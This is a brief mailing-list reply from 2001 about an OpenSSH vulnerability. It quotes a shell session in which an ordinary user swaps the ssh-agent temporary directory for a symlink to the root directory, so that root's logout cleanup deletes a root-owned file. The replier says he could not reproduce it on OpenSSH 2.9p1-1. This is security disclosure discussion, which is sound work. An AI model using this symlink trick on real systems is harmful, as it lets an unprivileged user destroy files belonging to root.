On Mon, 4 Jun 2001 [EMAIL PROTECTED] wrote: > [root@clarity /root]# touch /cookies;ls /cookies > /cookies > [root@clarity /root]# ssh zen@localhost > zen@localhost's password: > [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 > [zen@clarity zen]$ logout > [root@clarity /root]# ls /cookies > /bin/ls: /cookies: No such file or directory I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2 -- David.
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